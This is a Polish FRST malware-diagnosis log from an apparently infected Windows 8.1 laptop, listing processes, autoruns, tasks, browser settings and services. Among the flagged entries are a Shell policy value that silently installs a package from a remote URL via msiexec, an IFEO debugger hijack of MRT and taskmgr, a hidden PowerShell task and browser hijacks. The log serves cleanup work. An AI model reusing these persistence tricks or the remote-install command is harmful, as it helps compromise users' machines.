Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 17-01-2021
Uruchomiony przez Byaku (administrator) BYAKUYA (LENOVO 20250) (17-01-2021 13:53:53)
Uruchomiony z C:\Users\Byaku\Downloads
Załadowane profile: Byaku
Platform: Windows 8.1 (Update) (X64) Język: Polski (Polska)
Domyślna przeglądarka: "C:\Program Files (x86)\Bagsarah\Application\chrome.exe" "%1"
Tryb startu: Normal

==================== Procesy (filtrowane) =================

(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)

() [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
() [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\calibre.exe
() [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\calibre-parallel.exe <2>
(Adobe Inc. -> ) C:\Program Files (x86)\Adobe\Adobe Sync\CoreSync\CoreSync.exe
(Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud Helper.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe <4>
(Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Broadcom Corporation -> Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\BrMfcMon.exe
(Don HO don.h@free.fr) [Brak podpisu cyfrowego] C:\Program Files (x86)\notepad2\notepad2.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <32>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Guangzhou Ugee Computers Technology Co.,Ltd -> Ugee Technology Company Ltd) C:\Program Files\Pentablet\PentabletService.exe
(IDT, Inc.) [Brak podpisu cyfrowego] C:\Program Files\IDT\WDM\stacsv64.exe
(IDT, Inc.) [Brak podpisu cyfrowego] C:\Program Files\IDT\WDM\sttray64.exe
(Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation - pGFX -> ) C:\Windows\System32\igfxTray.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation - Software and Firmware Products -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation-Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe
(Intel(R) Corporation) [Brak podpisu cyfrowego] C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Lenovo (Beijing) Limited -> Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe
(Lenovo (Beijing) Limited -> Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\utility.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Motorola Solutions Inc. -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Motorola Solutions Inc. -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Node.js Foundation -> Node.js) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\libs\node.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe <3>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe <2>
(Open Source Developer, Derick Payne -> Rizonesoft) C:\Users\Byaku\Downloads\ComIntRep_5003\ComIntRep_5003\ComIntRep_X64.exe
(Panda Security S.L. -> Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe
(Panda Security S.L. -> Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe
(Panda Security S.L. -> Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAConsole.exe
(Panda Security S.L. -> Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe
(Panda Security S.L. -> Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe
(Qihoo 360 Software (Beijing) Company Limited -> ) C:\Users\Byaku\AppData\Roaming\360bizhi\Utils\NavPlugin.exe
(Qihoo 360 Software (Beijing) Company Limited -> ) C:\Users\Byaku\AppData\Roaming\360bizhi\Utils\RunDll.exe
(Qihoo 360 Software (Beijing) Company Limited -> www.ludashi.com) C:\Users\Byaku\AppData\Roaming\360bizhi\wallpaperhelper\guardhp.exe

==================== Rejestr (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)

HKLM\...\Run: [Energy Manager] => C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe [15794160 2013-11-27] (Lenovo (Beijing) Limited -> Lenovo(beijing) Limited)
HKLM\...\Run: [Lenovo Utility] => C:\Program Files (x86)\Lenovo\Energy Manager\Utility.exe [80368 2013-11-27] (Lenovo (Beijing) Limited -> Lenovo(beijing) Limited)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll [7770936 2013-04-12] (Motorola Solutions Inc. -> Motorola Solutions, Inc.)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1703424 2013-08-11] (IDT, Inc.) [Brak podpisu cyfrowego]
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2462536 2014-10-16] (NVIDIA Corporation -> NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [2800296 2014-10-16] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [Brak podpisu cyfrowego]
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation -> Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-10] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [MRT] => C:\Windows\system32\MRT-KB890830.exe [133315992 2018-06-15] (Microsoft Corporation -> Microsoft Corporation)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [PentabletService] => C:\Program Files\Pentablet\PentabletService.exe [2242328 2020-07-20] (Guangzhou Ugee Computers Technology Co.,Ltd -> Ugee Technology Company Ltd)
HKLM-x32\...\Run: [BrMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1163264 2012-09-25] () [Brak podpisu cyfrowego]
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.) [Brak podpisu cyfrowego]
HKLM-x32\...\Run: [gmsd_pl_93] => [X]
HKLM-x32\...\Run: [gmsd_pl_103] => [X]
HKLM-x32\...\Run: [gmsd_pl_109] => [X]
HKLM-x32\...\Run: [gmsd_pl_113] => [X]
HKLM-x32\...\Run: [gmsd_pl_114] => [X]
HKLM-x32\...\Run: [DiskPower] => C:\Program Files (x86)\DPower\DiskPower.exe [210432 2016-07-21] () [Brak podpisu cyfrowego] <==== UWAGA
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [Brak podpisu cyfrowego]
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2091064 2020-07-17] (Adobe Inc. -> Adobe Inc.)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-09-14] (Adobe Inc. -> )
HKLM-x32\...\Run: [PSUAMain] => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe [165120 2019-10-16] (Panda Security S.L. -> Panda Security, S.L.)
HKLM\...\Winlogon: [Userinit] C:\Windows\SysWOW64\userinit.exe, <==== UWAGA
HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\Run: [360wp-srv] => C:\Users\Byaku\AppData\Roaming\360bizhi\360wpsrv.exe [1636264 2016-12-08] (Qihoo 360 Software (Beijing) Company Limited -> 360.cn)
HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\Run: [CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-09-14] (Adobe Inc. -> )
HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj85OTlQNjVYRTkcNdF2MTlLNYUxFdwcRUF4RWFyMdzYNF== /q <==== UWAGA
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-12] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2020-05-04] (Adobe Inc. -> Adobe Systems, Inc.)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [174856 2014-10-16] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [156840 2014-10-16] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation)
IFEO\MRT.exe: [Debugger] C:\Program Files (x86)\Shubocult\_ALLOWDEL_aa7f2cc\Gubed.exe -Yrrehs
IFEO\taskmgr.exe: [Debugger]
GroupPolicy: Ograniczenia - Chrome <==== UWAGA
Policies: C:\ProgramData\NTUSER.pol: Ograniczenia <==== UWAGA
Policies: C:\Users\Byaku\NTUSER.pol: Ograniczenia <==== UWAGA
HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA

==================== Zaplanowane zadania (filtrowane) ============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {19F5D4F6-00BA-44A4-9758-54B40835CB03} - System32\Tasks\Mrsycikesh Agent => C:\Program Files (x86)\Kdaghgujuent\bnent.exe [779712 2016-12-11] (Glarysoft LTD -> Glarysoft Ltd)
Task: {20E410C7-9A9B-423C-9805-717B37F782CB} - System32\Tasks\{DF10CBC6-AC0F-43C1-95C4-0CC3585A4F2E} => C:\Windows\system32\pcalua.exe -a C:\PROGRA~2\COMMON~1\INSTAL~1\DRIVER\7\INTEL3~1\IDRIVER.EXE -d C:\Windows\SysWOW64 -c /reboot{07A540AB-D785-11D5-8E89-0090275862A0} /z
Task: {4783069E-8515-4671-B8AF-FAEC7CED0DB0} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [120636720 2020-05-13] (Microsoft Windows -> Microsoft Corporation)
Task: {5B0544EF-D1A1-499A-BA49-2ECD6DAE9ACE} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {5D7612A8-C6DE-4DB6-8081-BBC3F416C77E} - System32\Tasks\PC SpeedUp Service Deactivator => C:\Program Files (x86)\Przyspiesz Komputer\PCSUSD.exe <==== UWAGA
Task: {60FDCB38-0139-4E80-8A97-716671ECDDE9} - System32\Tasks\{8C34442B-70C3-49F8-B920-753547265428} => C:\Windows\system32\pcalua.exe -a C:\PaintToolSAI\uninst.exe -d C:\PaintToolSAI
Task: {6338096B-7333-47AE-8D1E-BE8AFA05CC93} - Brak ścieżki do pliku
Task: {718B63A9-375E-4828-B31B-F3B93BB84EE3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {7A7B10AE-5E6D-4083-BB14-060AAF25900A} - System32\Tasks\{96B12D76-B345-44D3-9FB3-1CA29A32D516} => C:\Program Files (x86)\Panda Security\Panda Security Protection\JobLauncher.exe [107976 2019-06-06] (Panda Security S.L. -> Panda Security, S.L.)
Task: {A20436DB-2CC0-411B-8501-049136F2EDC2} - Brak ścieżki do pliku
Task: {B04E4E2E-589F-4E3D-8D95-4DDF21A4500E} - Brak ścieżki do pliku
Task: {B191E081-3F7C-4EE6-986D-AD74AB6B946E} - Brak ścieżki do pliku
Task: {B77DE1B8-5F27-4D76-8C03-9D9EC43C625D} - Brak ścieżki do pliku
Task: {B7B6848A-CE8A-4266-BA31-443CA3EC195A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-07] (Google Inc -> Google Inc.)
Task: {BDF4F148-7284-45B3-A6E3-F037486ED754} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== UWAGA
Task: {F1194221-A49D-4C53-B742-C061C81444D2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-07] (Google Inc -> Google Inc.)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

Task: C:\Windows\Tasks\PC SpeedUp Service Deactivator.job => C:\Program Files (x86)\Przyspiesz Komputer\PCSUSD.exe <==== UWAGA
Task: C:\Windows\Tasks\{96B12D76-B345-44D3-9FB3-1CA29A32D516}.job => C:\Program Files (x86)\Panda Security\Panda Security Protection\JobLauncher.exe

==================== Internet (filtrowane) ====================

(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)

Hosts: W pliku Hosts jest więcej niż jedno wejście. Sprawdź sekcję Hosts w Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{35242337-E577-453E-AEC9-677CF8AEEE5D}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{8C20FF42-A164-4F08-ABF3-586EF5B9DE68}: [DhcpNameServer] 192.168.2.1

FireFox:
========
FF DefaultProfile: 9xdg7m8e.default
FF DefaultProfile: ir2zjn1y.default
FF ProfilePath: C:\Users\Byaku\AppData\Roaming\Mozilla\Firefox\Profiles\9xdg7m8e.default [2016-12-11]
FF Homepage: Mozilla\Firefox\Profiles\9xdg7m8e.default -> C:\ProgramData\Konksolexs\ff.HP
FF NewTab: Mozilla\Firefox\Profiles\9xdg7m8e.default -> C:\ProgramData\Konksolexs\ff.NT
FF Extension: (CinemaPlus-4.1v) - C:\Users\Byaku\AppData\Roaming\Mozilla\Firefox\Profiles\9xdg7m8e.default\Extensions\525eaf00-9712-4ce5-9c71-9aa6a175421b@gmail.com [2015-08-04] [Przestarzałe] [Brak podpisu cyfrowego]
FF SearchPlugin: C:\Users\Byaku\AppData\Roaming\Mozilla\Firefox\Profiles\9xdg7m8e.default\searchplugins\findit.xml [2016-12-11]
FF ProfilePath: C:\Users\Byaku\AppData\Roaming\Firefox\Firefox\Profiles\ir2zjn1y.default [2017-09-22] <==== UWAGA
FF Homepage: Firefox\Firefox\Profiles\ir2zjn1y.default -> hxxp://www.searchinme.com/
FF Extension: (SimilarWeb) - C:\Users\Byaku\AppData\Roaming\Firefox\Firefox\Profiles\ir2zjn1y.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-02-03] [Przestarzałe] [Brak podpisu cyfrowego]
FF Extension: (FF Adr) - C:\Users\Byaku\AppData\Roaming\Firefox\Firefox\Profiles\ir2zjn1y.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-02-03] [Brak podpisu cyfrowego]
FF Extension: (Polski Language Pack) - C:\Users\Byaku\AppData\Roaming\Firefox\Firefox\Profiles\ir2zjn1y.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-15] [Przestarzałe] [Brak podpisu cyfrowego]
FF SearchPlugin: C:\Users\Byaku\AppData\Roaming\Firefox\Firefox\Profiles\ir2zjn1y.default\searchplugins\startsearch.xml [2017-05-15]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.0 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-02-27] (VideoLAN) [Brak podpisu cyfrowego]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2020-07-17] (Adobe Inc. -> Adobe Systems)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-04] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-04] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2020-07-17] (Adobe Inc. -> Adobe Systems)

Chrome:
=======
CHR Profile: C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-01] <==== UWAGA
CHR HomePage: ChromeDefaultData -> hxxp://www.amisites.com/?type=hp&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.amisites.com/?type=hp&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT"
CHR NewTab: ChromeDefaultData -> Not-active:"chrome-extension://fdckocnfhibclnnkifmjbbogcfkbijki/main.html"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.amisites.com/search/?type=ds&ts=1483971231&z=8aa6b35883f51e431adfa77gfz4b6cct8m1g1o6c9g&from=archer1028&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms}
CHR DefaultSearchKeyword: ChromeDefaultData -> amisites
CHR Session Restore: ChromeDefaultData -> [funkcja włączona]
CHR Extension: (Prezentacje Google) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-12-11]
CHR Extension: (Dokumenty Google) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2016-12-11]
CHR Extension: (Dysk Google) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-12-11]
CHR Extension: (YouTube) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-12-11]
CHR Extension: (Browser Hunt) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\fdckocnfhibclnnkifmjbbogcfkbijki [2016-12-11]
CHR Extension: (Arkusze Google) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-12-11]
CHR Extension: (Dokumenty Google offline) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-12-11]
CHR Extension: (AdBlock) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-01-31]
CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-19]
CHR Extension: (Search People) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\papbadoldddalgcjcicnikcfenodpghp [2016-12-12]
CHR Extension: (Gmail) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-12-11]
CHR Extension: (Chrome Media Router) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-17]
CHR Profile: C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default [2021-01-17]
CHR HomePage: Default -> hxxp://do-search.com/?type=hp&ts=1425918500&from=cor&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT
CHR StartupUrls: Default -> "hxxp://do-search.com/?type=hp&ts=1425918500&from=cor&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT","hxxp://search.yahoo.com/?fr=hp-ddc-bd&type=616_pr__alt__ddc_dsssyc_bd_com"
CHR Session Restore: Default -> [funkcja włączona]
CHR Extension: (Dokumenty) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-13]
CHR Extension: (Dysk Google) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-23]
CHR Extension: (YouTube) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-03]
CHR Extension: (Adobe Acrobat) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-12-16]
CHR Extension: (AdBlock — najlepszy bloker reklam) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-16]
CHR Extension: (Usługa zwrotu gotówki LetyShops) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\lphicbbhfmllgmomkkhjfkpbdlncafbn [2020-12-29]
CHR Extension: (Into The Mist) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgihmkgobaljfehcadcckdggpeojaadh [2017-10-14]
CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-01]
CHR Extension: (Prolific Assistant) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\ocfncbnofopjedoepmekajbgdenadepp [2020-07-04]
CHR Extension: (Gmail) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-23]
CHR Extension: (Chrome Media Router) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-30]
CHR HKU\S-1-5-21-2709180964-3026329352-173763364-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [iinglghmhcgdgjjlafobajghjamdchik]

==================== Usługi (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [844856 2020-06-20] (Adobe Inc. -> Adobe Inc.)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3739728 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3511376 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
S2 CSHMDR; C:\Users\Byaku\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [Brak podpisu cyfrowego]
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel(R) Corporation) [Brak podpisu cyfrowego]
R2 Intel(R) Wireless Bluetooth(R) 4.0 Radio Management; C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe [156104 2013-06-04] (Intel Corporation-Mobile Wireless Group -> Intel Corporation)
R2 NanoServiceMain; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe [109536 2019-10-16] (Panda Security S.L. -> Panda Security, S.L.)
R2 Ntp2NetSvc; C:\Program Files (x86)\notepad2\notepad2.exe [2340864 2017-02-16] (Don HO don.h@free.fr) [Brak podpisu cyfrowego]
